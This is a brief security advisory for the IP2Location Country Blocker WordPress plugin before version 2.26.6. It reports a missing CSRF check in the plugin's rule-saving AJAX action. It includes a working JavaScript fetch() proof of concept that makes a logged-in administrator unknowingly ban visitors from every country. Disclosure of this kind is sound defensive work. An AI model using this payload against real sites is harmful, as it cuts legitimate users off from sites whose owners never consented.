IP2Location Country Blocker < 2.26.6 - Arbitrary Country Ban via CSRF

The plugin does not have CSRF check in the ip2location_country_blocker_save_rules AJAX action, allowing attackers to make a logged in admin block arbitrary country, or block all of them at once, preventing users from accessing the frontend.

PoC

Make an admin open a page with the following code in it, which will ban visitors from all countries: fetch(“https://example.com/wp-admin/admin-ajax.php”, { “headers”: { “content-type”: “application/x-www-form-urlencoded”, }, “body”: new URLSearchParams({“action”:“ip2location_country_blocker_save_rules”, “countries[]”: “nonexistent”, “mode”: 0}), “method”: “POST”, “credentials”: “include” }) .then(response => response.text()) .then(function(data) { console.log(data); });